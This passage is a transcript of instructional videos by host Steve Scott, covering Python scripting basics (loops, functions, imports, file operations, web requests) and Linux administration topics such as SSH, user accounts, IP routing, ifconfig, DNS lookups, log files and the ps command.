a number.
[Video description begins] He highlights the following line of code: val = input(" Enter a number: "). [Video
description ends]
So this will stop for user input. And I'll be able to type a number in and then there'll be a try block. So this is
another concept here of exception handling. So if an error does occur, it performs what's in the except block.
And there's a very important statement here called break. So to exit a loop early, in this case, the only way to
exit this loop is to call break, to use the break keyword to exit out of the loop. So this statement will quit the
loop for us, because the loop condition will always be true.
[Video description begins] The try block starts with the following line of code: try:. [Video description ends]
[Video description begins] He highlights the following line of code: intval = int(val). [Video description ends]
So what's happening here is I'm converting what's been typed in to an integer. And if this
fails, if anything other than an integer is entered, it will go to the except clause and break out.
[Video description begins] The except block starts with the following line of code: except:. [Video description
ends]
Otherwise, we'll print the intval; we'll just print it back. So now I'll exit out of this code. And what I'll do is run
./loops.py. So we get the first for loop that prints 1, 33 and 66. It sums up the total, although I don't print
anything in the first while loop. And then in the second while loop, I have to enter a number. So let's say 33, I
can enter 1 or 0 or -5. These are all valid integers. But if I enter something else like steve, it just breaks out of
the loop and the program ends. And that concludes this demonstration of Python loops.
[Video description begins] Topic title: Python Functions. Your host for this session is Steve Scott. [Video
description ends]
In this video, I'll demonstrate how to create custom functions in a Python script.
[Video description begins] The screen displays a Terminal window. [Video description ends]
So in my current folder in python_functions, I have a file called functions.py, which contains our script. So I'll
do nano of functions.py. Let's have a look at the function I've created. So this file begins, as all Python scripts
do, with the usual shebang for python3. Then I have the keyword def. So def is to define a function, and that
function's called greet. And now in the parenthesis after our function name, we have the parameters.
So these are the arguments that the greet function accepts. We have the variable greeting equals two single quotes, so this sets a default value. So if an argument is passed, then greeting is set to whatever value was passed. Otherwise, if no argument is passed, it's set to an empty string. And then I have a comma, and recipient = two single quotes again. So we have two default values that set both parameters to empty strings.
And then after the parameters are listed, we close the parentheses, and then we put a colon. And then, indented under the def of the function, we have the function body. Then the function ends when the indent goes back to the leftmost justification. So this greet() with open and close parentheses is where the function body ends and the first line of the main code begins. So let's have a look at the body
of the function.
[Video description begins] This line of code ends with a colon. [Video description ends]
So I have, if not greeting, so not is saying that if greeting is empty, inside of that I put greeting = 'Hello'.
[Video description begins] Hello is placed inside the single quotation marks. [Video description ends]
[Video description begins] This line of code ends with a colon. World is placed inside the single quotation
marks. [Video description ends]
So when we print the greeting, by default, greet will return Hello, World! and then we have a return statement. So
in this case, we return a string, and it's an f string or a formatted string. So we use the Python3 syntax where
we have the f followed by a string in single quotes in this case. Then in braces, we have the variable, greeting.
So in braces we have greeting, then a comma and a space, then in braces recipient, followed by an exclamation
mark and we close the string. So in the main body of the code, I have greet. So I call it with the open and
closed parenthesis, so no arguments are passed to the function.
[Video description begins] He highlights the following line of code: print(greet()). [Video description ends]
And then I call print of greet. So the first call to greet won't actually do anything because the greet function is
returning a value but it's not printing anything. So this will go unnoticed. But if I call print on greet, it will
print the string returned by the function, greet. We can also save the result in a variable.
[Video description begins] He highlights the following line of code: result = greet('Hi', 'Jessica' ). [Video
description ends]
So I create a variable called result and I set that equal to greet. And then the arguments I pass are the string, Hi,
and the name, Jessica. So we have two strings passed, and then I print result. So let's exit out, and I'll run the
functions.py script. So ./functions.py. And we see Hello, World, and Hi, Jessica. And that concludes this
demonstration of Python functions.
In this video, you will learn how to import external modules in a Python script.
Objectives
[Video description begins] Topic title: Python Imports. Your host for this session is Steve Scott. [Video
description ends]
In this video, I'll demonstrate how to import external modules in a Python script. So in this example, I'm going
to import modules from Python's standard library, specifically for date, time, and calendar.
[Video description begins] The screen displays a Terminal window. [Video description ends]
Which come up quite often in Python scripting. So I'm going to open using nano the imports.py in my current
folder. So it starts with the python3 shebang and then I import time, import calendar, import locale, and from
datetime, I import date, datetime. So the from import syntax, so we say from the datetime module, we want to
import the date and datetime objects from that module. So if there are objects within a module, we can import
them directly with this syntax.
So let's look at some ways we can access and use the date and time. So the first thing is to get the UNIX time.
So this is sometimes called the UNIX epoch. So, this is the seconds passed since midnight, UTC on January
1st, 1970. And the seconds is not just resolved to the nearest second, but there's also a long decimal fractional
second after it.
[Video description begins] He highlights the following line of code: print('Time since UNIX epoch:
{}'.format(time.time())). [Video description ends]
So I'll print the string, Time since UNIX epoch: and then the open and close brace where we're going to insert
the time. So I'll use .format on the string, and then time.time with parenthesis. So we're calling the time
function from the time module.
And then I print an empty space, so an empty print, so it'll have an empty line between this example and the
next one. The next one is to print an ISO-8601 formatted datetime. So we could do it with the local datetime
and with the UTC datetime.
[Video description begins] He highlights the following two lines of code: print('Local:
{}'.format(datetime.now()))print('UTC:{}'.format(datetime.utcnow())). [Video description ends]
So I print 'Local: {}'.format on the string with datetime.now. Now, one of the confusing things about the
datetime module in Python is that if we just did an import of datetime. So instead of from datetime we import
date and datetime. If I just did an import on datetime, I would actually have to call this function using
datetime.datetime.now.
[Video description begins] He enters the following line of code: datetime.datetime.now(). [Video description
ends]
Which gets a little bit confusing because there's the datetime module, but the datetime object within the
datetime module. So that's why I use the from syntax, so from datetime I import datetime. So I'll just delete
these two lines that I added for the example and continue on. So I print the string UTC: {} .format, and then
datetime.utcnow, which will give the UTC time rather than the local time. And then I print an empty line and
continue on with the next example.
So here I'm going to print only the date part. So only the year, month, and day in the ISO-8601 format, but just
with the date. So the first one will have the four digit year, hyphen, two digit month, hyphen, two digit day. So
it'll have 01 for the month of January, and the day will also be prepended with a 0 for a number less than 10.
[Video description begins] He highlights the following line of code: current = date.today(). [Video description
ends]
I can also change the formatting of the date and time. So in the next example, I print Current date, but to format it I call its method strftime. I think of this as "string formatted time".
So I put a %A, then %B %d and %Y, an upper case Y. So this formatted time, the %A will give the day of the
week, the %B will give the full name of the month. %d, the day, the numeric day of the month, and %Y the
four digit year. And then we put an empty print statement. I can also print a text based calendar representing
the current month or whatever month I pass to it.
[Video description begins] He highlights the following line of code: print('Calendar:'). [Video description
ends]
I print calendar.month, so I call the month function of calendar and I pass current.year and current.month. So
it's going to print the calendar for the current year and month and then I put an empty print and then I print the
locale info.
So the locale info is important. If you're working in a different language, you'll get different names for the
months. And you'll get different date and time formats based on the locale. So if you are working in English, or
French, if you're in the US it's different than if you're in Spain or Italy or France or Denmark. Wherever you
are, the date and times will be in different formats. So now I'll exit out of the code and we'll run ./imports.
So I get the time since the UNIX epoch, and it's this long number with a dot: the number of seconds, a dot, and the
fractional part of the second. The local time is 2020-03-18, so March 18. At 23:41:46, so 23 hours, 41 minutes
and 46 seconds with a fractional part to the seconds. The UTC time is three hours ahead of this. So the UTC
time is actually on March 19. The current date is 2020-03-18. So we get the date part, or the current date is
Wednesday, March 18, 2020.
We get this nicely formatted calendar for March 2020. With the first beginning on a Sunday and the 31st on a
Tuesday, and all of the dates in the calendar weeks. And the locale for this system is en_CA. So it's English,
Canada, and the character encoding is UTF-8. And that concludes this demonstration of Python imports, using the standard library date, time, and calendar modules.
[Video description begins] Topic title: Python File Operations. Your host for this session is Steve Scott. [Video
description ends]
In this video, I'll demonstrate how to read and write files in a Python script.
[Video description begins] The screen displays a Terminal window. [Video description ends]
So in my current folder, I have a few files. So I have files.py, I have file.txt, and I have output.txt. So I'm going
to open up files. And this is going to interact with the files in the current folder. And we'll have a look and see
what we're going to do. So in this script, we begin with our usual shebang for Python 3. And then I have an
example.
[Video description begins] He highlights the following line of code: with open('output.txt', 'a') as f:. [Video
description ends]
So a few lines down after the comments I have with open, I pass the string output.txt. So it's going to open up
the output.txt file in the current folder, a. So the a specifier is for append. So it's not going to overwrite the file.
It's going to append to it. So there's different options as the second argument in the open function. We can pass
w for write, a for append, and r for read. We can also add a b to it. So if we had ab, it would expect the file to
be a binary file, but we're working with text files.
So in this case, we leave the b off, and I'm going to append to the current file. So I have with open output.txt, a
as f. So we need a file handle to operate on the file after it's open. And with the "with open" syntax, if this open fails, it will exit out of this block and won't do anything with the file. So it's a way of checking if the file opened successfully: if it did, it executes the block of code, otherwise it continues on.
[Video description begins] He highlights the following line of code: f.write('Hello, World!\n') as f:. [Video
description ends]
So inside this block of code, I have f.write and I write the string Hello, World. Followed by a \n, because the
write doesn't automatically put the newline character in, so I put it in.
[Video description begins] He highlights the following line of code: f.close(). [Video description ends]
And then it's always good practice at the end of our with open block to call f.close to close the file. Now I'm
going to open a file for reading, and I'm going to read a text file line by line. So what I'm going to do is take
the line and prepend a line number to it and print it to the standard output. So I have line_number, so the line
number variable starts out at 1. So I set it = 1, and then with open file.txt, r.
[Video description begins] He highlights the following line of code: with open('file.txt', 'r') as f:. [Video
description ends]
So we're opening this for reading and as f. So we're going to use the f variable as the file handle. Now to read it
line by line, I can use a for loop.
[Video description begins] This line of code ends with a colon. [Video description ends]
So for line in f, so for each line, I remove the newline character from line because it's going to read it with the
newline character. So we don't want an extra newline being printed when we call print.
[Video description begins] He highlights the following line of code: line = line.rstrip(). [Video description
ends]
So I'm going to strip that out of it. So on the right-hand side, it's going to strip out the newline character and
any other white space on the end of the line. So I set line = line.rstrip. So it strips out from the right-hand side
of the string, so the end of the string.
[Video description begins] He highlights the following line of code: print(f'{line_number}: {line}'). [Video
description ends]
And then I print the f string. So I have f followed by the string with line number in braces colon space, and
then the actual text for the line.
[Video description begins] He highlights the following line of code: line_number += 1. [Video description
ends]
[Video description begins] He highlights the following line of code: f.close(). [Video description ends]
And then when we exit the loop, we call f.close to close the file. Now I'll exit out and do a ./ of files.py. So the
contents of the file.txt was this passage of text. And it repeated the text, this little bit of Shakespeare, by
prepending line numbers to it in the print statement. So 1: Thou speak'st aright. And if I do a cat on the output,
we can see the contents of it. So in this case, there's been a few Hello, Worlds put in the file and then our
Hello, World on the new line.
And if I run the file again, so if I run ./files, it prints the same content from file.txt. And if I do cat of output
again, it put another Hello, World! at the end of that file. So it appended it. And the reason for these first three
Hello Worlds in the first line without a new line character, well, that was when I was preparing the code. I
didn't put a new line in and it just put them on the same line and it just kept appending them.
So when I put the new line in, it started putting them on the new lines. And if I run it one more time and do a
cat of output.txt, we get one more. And that concludes this demonstration of Python file operations.
[Video description begins] Topic title: Python Web Requests . Your host for this session is Steve Scott. [Video
description ends]
In this video, I'll demonstrate how to make web URL requests from a Python script.
[Video description begins] The screen displays a Terminal window. [Video description ends]
So in my current folder, I have this web_request.py file, which I'll open with nano. So nano of web_request.py.
And this script starts out with the python3 shebang, and then an import of requests. So we use the requests
module to make a URL request to fetch a web page. And I import the re module for regular expression.
[Video description begins] He highlights the following line of code: url='http://example.com'. [Video
description ends]
So we're going to pull out the title from a webpage we're going to request. And the URL for the webpage is
going to be http://example.com.
[Video description begins] He highlights the following line of code: result = requests.get(url). [Video
description ends]
And then I call the request, so result = requests.get with the url as its argument.
[Video description begins] He highlights the following line of code: if result.status_code != 200:. [Video
description ends]
Now, requests also has a post function where we can post form information as well. But in this case, we're
going to keep it as a get request. So we're just going to fetch the contents without submitting any information.
Now, when a web request returns in the HTTP protocol, it gives us a status code. Now the status code for
success is 200 and we're expecting a 200. So if it's anything else, we're going to deem it a failure.
[Video description begins] He highlights the following line of code: raise ConnectionError('Status code:
{}'.format(result.status_code)). [Video description ends]
So if result.status code is not equal to 200, we're going to raise an exception. In this case it's called a
connection error exception. We'll print the status code that we do get from the connection error if there is one.
So it's always good practice when making web requests to check the status code to make sure you're getting the
status you expect.
And most often, it's 200. There can be success with other status codes like a 204. But in that case, 204 means
that the request was successful, but there is no content being returned. In this case we're expecting a webpage
to be returned.
[Video description begins] He highlights the following line of code: match = re.search('<title>(.*?)</title>' ,
str(result.content)). [Video description ends]
And the result is stored in the content property of result, so result.content. So what I'm going to do
is look for the title tag. So I'll do a match = re.search. And then the string we have the title tag, so the title in
the angle brackets, and then we have our regular expression. So the pattern match with the (.*?) and then we
close the title tag so the open-angle /title and the close angle bracket. And then we pass the str of result.content
to make sure we're getting it in string form.
[Video description begins] He highlights the following line of code: title = match.group(1). [Video description
ends]
And then I call title = match.group(1). So group(1) in the match object contains what's in the match itself
between the tags. And then we print that title. So we're just extracting the title tag from this page. Now I'll go
to the command line and do ./web_request.py. So it made a request to example.com, it got the contents, and
printed example domain. Now, if we want to see the entire contents, we could do a print of str of result.content.
[Video description begins] He enters the following line of code: print(str(result.content)). [Video description
ends]
And we can see all the text of the HTML code. So I'm going to make that change and run it again. And in this
case, we get all of the data from the page. It's quite messy because it's not formatted. And if we scan it, we can
see there's a title tag and a close title tag, and inside we have example domain. And that's exactly what we extracted, so we got what we expected. And that concludes this demonstration of a Python web request.
Objectives
So in this course, we've examined how to use some of the common statements and loops in both Bash and
Python scripts. We did this by exploring the elements in a scripting language as compared to a full-fledged
computer program. How to work with variables and conditional statements in Bash scripts. How to create
custom functions, and work with looping statements in Bash scripts.
Then how to work with variables, conditional statements, and looping statements in Python scripts. And how
to create custom functions and import external modules in Python scripts. How to perform file operations in
Python scripts. And how to make URL requests in Python scripts. In our next course, we'll move on to explore
how to work with some of the essential management and monitoring tools available in the Unix and Linux
environments.
Table of Contents
Objectives
[Video description begins] Topic title: Course Overview [Video description ends]
Hi, I'm Steve Scott. I've been a software developer and IT consultant for almost a quarter of a century.
[Video description begins] Your host for this session is Steve Scott. He is an IT Consultant. [Video description
ends]
I've traveled around the globe to serve clients, responsible for building software architectures, hiring
development teams, and solving complex problems through code. With my toolbox of languages, platforms,
frameworks, and APIs, I round up my coding experience with a formal background in mathematics and
computer science. In this course, we're going to explore management and monitoring tools available in the
Unix and Linux environments, including working with user accounts and domain names, and monitoring user
and system activity. I'll start by examining how to securely connect to a remote server using SSH, and how to
work with user accounts in a Linux system.
And then I'll explore the elements of both an Internet Protocol routing table and a network interface. And show
how to perform Domain Name System lookups. Next, I'll examine the log files for monitoring critical events
on a Linux system and use the PS command to retrieve process information. And show how to retrieve disk
usage, partition information, and directory contents of a Linux system. I'll then demonstrate how to monitor
both user and system activity on a Linux system. Lastly, I'll demonstrate how to configure the time and date
services and explore the system configurations in the /etc folder of a Unix system.
[Video description begins] Topic title: Remote Shell Access. Your host for this session is Steve Scott. [Video
description ends]
In this video, I'll demonstrate how to connect to a remote server using SSH. So SSH stands for Secure Shell.
So you're connecting to a remote computer and typing commands, as if you were connected directly to it
physically with a monitor and keyboard. I'll talk about some considerations for making sure your SSH
connections are indeed secure.
[Video description begins] A blank terminal window displays. The menu bar displays the following six options,
namely: File, Edit, View, Search, Terminal, Help. The control buttons to "Minimize", "Maximize" and "Close"
the window display at the top right. [Video description ends]
So if I want to connect to a remote computer, I type ssh followed by the username and the host. So my remote computer's address is [email protected]. Now the first time I connect, it's going to tell me that the authenticity cannot be established. And it gives me a key fingerprint, an ECDSA key fingerprint in SHA256
form. So it has this yzb0Rph, etc. So it says do you want to connect, are you sure you want to continue
connecting? Well, typically, you type yes and assume everything is fine. Now if you want to be completely
sure, you can go to the remote computer physically and double-check this key fingerprint. So I'm going to
bring in the actual terminal window from the computer I'm recording on, the computer we're trying to connect
to, and
[Video description begins] A blank terminal window titled "bash" appears over the terminal window. [Video
description ends]
do a key scan to determine if the fingerprints are indeed the same. So if the remote computer shows one
fingerprint, and the local computer that we're connecting to shows a different one, then somebody is likely
eavesdropping in the middle of the connection and performing a man-in-the-middle attack.
[Video description begins] He enters a command in the "bash" window. [Video description ends]
But if we do an ssh-keyscan -t ecdsa, so we use the same key type or the same algorithm, and then we're doing it on the local computer, so localhost. We want to redirect standard error, so 2>/dev/null. So this redirects any standard error output to /dev/null, because we don't want to include it in the key signature. So then we pipe that into ssh-keygen -E sha256, so we're using the same fingerprint algorithm, and -lf. And since the key is coming in on standard input, we put a hyphen at the end for the file name.
[Video description begins] He presses enter after writing the command in the "bash" window. [Video
description ends]
And if we look at the signatures, just looking at them, yzb and yzb, they both start the same way; they have the exact same signature.
[Video description begins] He minimizes the "bash" window. Now, the previous terminal window displays on
the screen. [Video description ends]
So we can select yes, we want to continue connecting. And it tells me that we've permanently added
192.168.2.20, the ECDSA signature, to the list of known hosts. So since we've established the authenticity, we
don't need to do it again. And it tells me that there's a broken pipe. We took too long to perform the
connection, so it aborted partway through.
[Video description begins] He enters the following command: ssh [email protected]. [Video description
ends]
But now, when I connect, it just asks me for a password. So I can type in the password, and now we're
connected to the remote computer. Now hit exit on the remote computer. So we're connected to a remote
system as if we were running commands locally. But I'm just going to exit and logout of that connection, and
now our prompt goes back to our local machine. Now another way we can do this and make this connection is
to create a key, a public/private key pair, and share our key with the remote system. So for any future connections, we don't need to type in the password every time. We've already shared our key, so that it can verify our
identity.
So if I do ssh-keygen -t, let's make an rsa key, and then -b of 4096 bits. So it creates the public/private key
pair. Give it the default name, the id_rsa. And now, if I do ssh-copy-id to that previous connection,
[email protected], I put in my password, and now it copied the key. Now if I do ssh [email protected],
it connects without asking me the password. And if I type uname, it shows me that the local system is Darwin,
which is the underlying operating system in MacOS. So we're connecting to a Mac computer.
Now if I exit out of that system again, I want to show you one more thing. We can actually execute commands
remotely through SSH, and get the results locally. So this is very handy when you have to administer remote
systems. So if I type ssh [email protected] again, with a space, and then in quotes, I type a command. So
let's say uname, and it returns Darwin, the same thing as if I ran it locally on the remote system. And that
concludes this demonstration of remote shell access using SSH.
In this video, you will learn how to create, modify, and delete user accounts in a Linux system.
Objectives
[Video description begins] Topic title: User Accounts. Your host for this session is Steve Scott. [Video
description ends]
In this video, I'll demonstrate how to create, modify and delete user accounts on a Linux system. So by default,
I don't have privileges to run the Add User command. I either need to be a root user or need to be able to
escalate or elevate my privileges to run the command. So since I'm logged in as my account Steve, I use the
sudo command spelled
[Video description begins] A blank terminal window displays. [Video description ends]
sudo, and then adduser. And then I type the user name I'd like to create. In this case, I'll create an account for
Bob. Now it asks me for a password for my local account because I'm going to escalate my privileges to run
the Add User command. So I type in my password. So it creates a basic directory structure, a home directory
for Bob, with a new group bob and a new user bob. And it says copying files from /etc/skel. So this is what they call the basic skeleton of Bob's profile. So it creates Bob with the basic profile, and we assign Bob a password, and it tells me it's a bad password. So let me put in something a little better. And now we can put in
some information for Bob, we can put a Name, a Room Number, a Work Phone. Whatever we'd like to put in.
And then once the information is correct, the user Bob has been created.
[Video description begins] The other two pieces of information credentials are titled: Home Phone and
Other. [Video description ends]
Now we can check Bob by typing id of bob. So it gives me the user id of bob, Bob's group id, and what groups
bob belongs to. And by default, Bob only belongs to his own group. Now we can run the sudo usermod
command. So this is to modify a user, and the options are -a for add and uppercase G for group, and then we type sudo. So we're going to add Bob to the sudo group. So Bob will be able to run sudo commands and run commands as root. So we'll type bob, his username, and now if we type id of bob again, we see that Bob now
belongs to the sudo group. Now we can log in as Bob by typing su for switch user, the hyphen, and then Bob.
So the hyphen ensures that we log in as Bob using Bob's own bash environment.
And now we're logged in as Bob. And we can type ls, or ls -la, to see everything in Bob's home directory, including hidden files like .bash_logout, .bashrc and .profile. So Bob's account is created with a few basic files to define his local profile. If we want to log out of Bob's account, we type exit again, and from the prompt you can see
we were connected as Bob@vm1. So this local computer is called vm1. So when we use su we switch from
Steve, to Bob. And then back to Steve again when we run the exit command. Now if I want to remove Bob, I
can do sudo userdel Bob. And this deletes Bob's account, and he's no longer in the system. Now if I type in
ls /home,
[Video description begins] The screen displays the following two results: bob, steve. [Video description ends]
you'll see that Bob's directory was not deleted even though his account was. So if there are any files that need
to be retrieved or backed up or saved from Bob's user folder, his home folder, then we can do that before
removing the folder entirely. And that concludes this demonstration of user accounts in a Linux system.
[Video description begins] Topic title: IP Routing. Your host for this session is Steve Scott. Screen title: Data
from Host to Host [Video description ends]
In this video, I'll identify and describe the elements of Internet protocol routing, or IP routing, which includes
packets, routers, gateways, addresses, and routing tables. And I'll describe how it all fits together from a high-
level perspective. So we're talking about communicating over a network, passing data from host to host and
back again across cables and through routers, from a source to a destination. Establishing those connections is
not unlike getting from point A to point B in a car, going from one street address to another. We use maps and
follow a path, turning at appropriate intersections and getting on and off highways at the appropriate locations.
Passing data across the Internet is somewhat similar.
And when it comes to the Internet, we say we're going from one host to another. Where a host is just a
computing device connected to a network that responds to or serves requests. So we first have to start with a
way of uniquely identifying a computer on a network. With the massive size of today's Internet, it seems like a
daunting task to route information from one computer to another computer all the way around the world. Not
unlike the postal service or postal addresses. Instead of country, region, city, street, we use a MAC address. A
Media Access Control address or identifier. And we use a NIC, a Network Interface Controller address. This
provides our data link through Ethernet, through a connected cable or Wi-Fi for wireless communications in
most IP networks.
[Video description begins] Screen title: Routing Addresses [Video description ends]
So conceptually, when we're talking about how computer networks route data to the intended address, we need
a local network or a subnet, where everything sits behind a local router. When we're sending packets to an
intended destination, through the local network interfaces, we need to go through a gateway to determine what
needs to be done. Where the data needs to go, whether they're being sent to a local address, or whether the
gateway must route the data to another network, to transmit and receive from external sources and not just
within a local subnet.
Now for IP addresses, to be specific IP version 4, the addresses look like the form 192.168.2.101, for example. So there are four numbers of up to three digits each, and the numbers are between 0 and 255. Where the gateway typically
sits on a router or a small computing device, either with antennas for Wi-Fi or a bunch of Ethernet ports with
individual cables plugged into them. And most often the IP address for our routing device for our gateway ends
in a 1, but not always. So, when we have a gateway, the typical address, in this case, would be 192.168.2.1, but
not always. We also have a local Netmask to determine the size or IP range of our local subnet.
In this case in this example, we would have a netmask of 255.255.255.0. So everything that starts with the
192.168.2 portion of the address is on the local subnet. And the last number varies. So we could have 254
possible hosts on the local network. And any addresses outside of that range get routed by the gateway to
whatever's upstream, such as our Internet service provider. And then our Internet service provider routes the
traffic for different IP addresses based on this sort of hierarchy. So in terms of the larger Internet, there's a
hierarchy of routing tables that determine where to send packets. We have the ARP table or address resolution
protocol table, which is part of mapping for the IP addresses to MAC addresses.
We have the MAC table, or content-addressable memory (CAM) table, to determine where traffic needs to go
on a local network or Ethernet frame. So in general, when we refer to the routing table, we're talking about a
router's network interface table which has information about hosts on the network. Such as what I
demonstrated in the video titled Network Interfaces using the ifconfig command. So the routing table contains
network identifiers, destination of where the data should be transmitted. Metrics about the cost of the intended
route so that it can be sent efficiently, and address information about the next hop in the network from router to
router of the networks we're transmitting data to.
So it's very easy to get lost in the details of how this gets implemented. In most practice, when managing a
network, routers, and servers, or host computers on the network, the high-level picture of network addresses or
IP addresses, gateways and netmasks are enough to get started with and get a sense of how data is transmitted
from source to destination and back again. And that concludes this presentation on IP routing.
After completing this video, you will be able to describe the elements of a network interface using the ifconfig
command.
Objectives
[Video description begins] Topic title: Network Interfaces. Your host for this session is Steve Scott. [Video
description ends]
In this video, I'll describe the elements of a network interface using the ifconfig command. So most often I use ifconfig to view the information about the network interface configuration. So ifconfig is short for interface config. It also provides a way of configuring a network interface. But unless you're configuring a router, or your PC or workstation is operating under some special network circumstances, you rarely need to manually configure it using ifconfig. It's often the case that our local network router will
assign address settings for us using the Dynamic Host Configuration Protocol or DHCP. So we're talking about
configuring or viewing the configuration of a software interface that either connects to the physical interface of the network controller hardware, or to some virtual interface like the loopback, a bridge, or a virtual LAN interface for software-defined networks.
[Video description begins] A blank terminal window displays. [Video description ends]
So let's run the ifconfig command, and we'll see the results. So I'll start with the second entry, where it has lo.
So in this entry, it's the loopback address. So this is the loopback interface that's used as a virtual interface for
local communication within this computer itself. Even if there's no network card or Ethernet, this local
interface is still available. And we access it using the 127.0.0.1 IP address, which is mapped in the /etc/hosts file as localhost. So if I ping this interface 127.0.0.1, locally I'll get a response. Now, I'll clear this window
and I'll run ifconfig again.
And let's talk about the Ethernet adapter, or the Ethernet interface. So we typically see Ethernet interfaces
starting with the letter e. Most frequently with eth0, or em0, or in this case I have enp0s3. So let's start with
some of the options. So we have things like the inet address, which is the IP version 4 address, in this case
192.168.2.63. Which is what I use to access this computer or reference it locally on the local subnet. We have
the net mask or network mask for this subnet, which is 255.255.255.0. We have the broadcast address,
192.168.2.255. And then we have the inet6 equivalent, so the IP version 6 address.
The ether is the MAC address for our hardware. The mtu up at the top is the maximum transmission unit in bytes, and the default, which is what it's almost always set to on modern hardware, is 1500 for an Ethernet interface. A few other things that you should be aware of are the RX packets, so the received packets; the RX errors for receive errors; the dropped packets; the overruns, so received packets that experienced buffer overruns; and the number of misaligned frames, which is an error condition in the received frames. Then we have the transmitted packets, the total transmitted, the number of bytes, and then the transmit errors, overruns, dropped packets, carrier errors, so these are loss-of-carrier errors, and the Ethernet collisions. So there's a fair
bit of information here that we have available when we run ifconfig, and we get a snapshot of it each time.
Now in some Linux systems, there is an alternative to ifconfig which is the ip command. If you type ip space
address, you get some of the same information, but we don't get the received and transmit info. When we type
ip address, we just get the interface details. And that concludes this demonstration of network interfaces.
In this video, find out how to perform Domain Name System lookups.
Objectives
perform Domain Name System lookups
[Video description begins] Topic title: Domain Names. Your host for this session is Steve Scott. [Video
description ends]
In this video, I'll demonstrate how to perform domain name system lookups or DNS searches. The simplest
form of a DNS lookup is to translate a domain name into an IP address. And the reverse is true as well. We can
take an IP address, and often return an associated domain name, or multiple names associated with an IP
address. Of course it is the case where many names, many DNS entries domain names can point to a single IP
address.
[Video description begins] A blank terminal window displays. [Video description ends]
So let's try one. Let's do host of example.com. So it returns an address. The IP version 4 address in this case is
93.184.216.34. And it has an IPv6 address, and it has example.com mail is handled by 0 and then period. So it
doesn't really have a mail entry. We could try another host. Let's try host cbc.ca for the Canadian Broadcasting
Corporation. Now it has a little bit more information and it has an address, so an IP address. And then it has
some mail servers, the aspmx.l.google.com addresses, which are common when it uses Google services to
handle its email. We can also show a complete entry with all records using host -a of cbc.ca. Now let's try a
host query by putting in the IP address. So cbc.ca has an address in this case of 23.14.157.242. I'm going to
copy that.
[Video description begins] He selects the address and right clicks over it. A drop down menu with the
following options appears, namely: Open Terminal, Open Tab, Copy, Paste, Profiles. He selects the option:
Copy. [Video description ends]
And now I'm going to type host and paste in this IP address. And it gives me something else. It gives me this
IP address .in-addr.arpa. So arpa currently stands for address and routing parameter area. And this points to
this long address with the a and 23-14-157-242.deploy.static.akamaitechnologies.com. So the IP address
doesn't actually point back to cbc.ca. It points to another host, and this is likely a service provider or data
center host, the provider Akamai that handles web hosting for the CBC. We can also narrow our searches, our
requests to specific DNS records, such as MX for mail exchange, NS for name servers, text records, or SOA
records for start of authority records.
So let's try some of those now. So we'll do host -t MX and cbc.ca. So it only returns the mail service entries.
We could do the same thing with the name servers doing host -t ns and cbc.ca. And it shows the name servers,
so these servers with .akam.net. Again, this corresponds to the akamaitechnologies.com, so it's likely they are a
service provider. We can see that text records host -t txt, with cbc.ca. And it shows us some text records that
are defined. And finally, let's look at the host -t SOA of cbc.ca. And it gives us an SOA record with the
appropriate information.
Now various applications or service providers use the various records, especially the mail servers, to determine
mail services. The text records are now often used for verifications, either site verifications or mail key signing, like the DKIM signature or the SPF record, which we get in the output of the text record. So
these are some of the basics for performing DNS or Domain Name System lookups from Linux. And that concludes this demonstration of Domain Name System lookups.
describe the important log files on a Linux system that are used to monitor for critical events
[Video description begins] Topic title: Log Files. Your host for this session is Steve Scott. [Video description
ends]
In this video, I'll describe the important log files in a Linux system to monitor for critical events. Now this may
vary from distribution to distribution, from Linux to BSD or other Unixes, but in general, we have our log files
in the /var/log folder.
[Video description begins] A blank terminal window displays. [Video description ends]
So I'll run ls on this folder now. And we can have a look at some of the common ones and some of the ones
that you should look for and why you should look at them. So one is boot.log. So this one is for boot messages,
including init script messages, anything gets logged here from those startup processes. This is important to
investigate when you get unexpected reboots or boot failures that occur. We have the fail log. So these are
failed logins or failed login attempts. It's good to check and to look for unusual login attempt activity and why
they're failing. In the apt folder, so I'll do an ls /var/log/apt.
This gives us a log of upgrades, including unattended-upgrades that happen especially for automatic security
updates. So if you ever experience system instability, or application instability, and it's not caused by any other changes in the system, it could be caused by an upgrade, and you could track it down here as a potential
source. We also have the fail2ban.log. Now this is specific to the fail2ban intrusion prevention system. This is
especially important when you have a situation where there's too many failed SSH attempts. So someone's
attempting to SSH and connect and login remotely.
This intrusion prevention system or IPS can block or ban or set a long timeout before it allows another attempt.
So we can see what attempts are made and blocked. And this is effective for investigating attempted intrusions.
In the nginx folder we have the webserver logs. It's obviously important if you're serving HTTP content. And
this also depends on the webserver. You could have an HTTPD folder or Apache folder as well, depending on
the type of webserver you're running. There's also the syslog.
Now this can be used by various system services and application services. It's quite often used by services like
the crontab. And it's a standard logging mechanism with the standard logging format. Quite often when I've
created web services or web apps or APIs in the past, I logged them to the syslog. So depending on what's
running and what choices are made in terms of logging, the syslog can contain a wealth of information. And
the other one here we have that's very important is the auth.log. All authentication and escalation-of-privilege events, like root logins or commands run with sudo, and anything related to failed authorization attempts, get logged here.
Now a few that aren't here: quite often in different Unix and Linux systems, we have a messages log for system log activity, for informational messages and non-critical information. Another one that
I don't have here is the dmesg log. Where there's device or physical hardware messages, drivers, kernel ring
buffer logs, hardware errors, they get logged in dmesg. And another alternative to the auth.log is the secure log
file. This comes up more often in Red Hat or CentOS Linux distributions. So monitoring log activity can be a
time consuming task, but it's the first line of investigation for system errors and for threats and breaches. And
that concludes this demonstration of log files.
In this video, you will learn how to use the ps command to get process information.
Objectives
[Video description begins] Topic title: Process Reporting. Your host for this session is Steve Scott. [Video
description ends]
In this video, I'll demonstrate how to use the ps command to get process information. So I've covered some of
the basics of ps in the video titled, Process Management. But here I'll go deeper into some more options of the
ps command. And ps does have many options. Even though in most cases we use ps with the -e switch or the -ef switch, then pipe it into grep to find what we're looking for. There are many other options that make it a
powerful tool when we know what the capabilities are.
[Video description begins] A blank terminal window displays. [Video description ends]
So how I typically use it quite often I'll do ps -ef | grep and then I'll put in a process name. So let's say nginx
for the web server.
[Video description begins] The process name is placed inside the double quotation marks. [Video description
ends]
And we here we have some worker processes, and a master process for the nginx web server. We can also use -
A to show all which shows some of
[Video description begins] He enters the following command: ps -A. [Video description ends]
the same information, but here it gives us the entire list. So I have all of that in this list and if I pipe this into
grep nginx, I get similar information but
[Video description begins] He enters the following command: ps -A | grep "nginx." [Video description ends]
I get the condensed version of the process name. So we don't see which one is the worker process and
which one is the master process. So only the child processes and not the parent process. Now if we only want
to see the child processes, we could do ps -d, and pipe that into grep nginx.
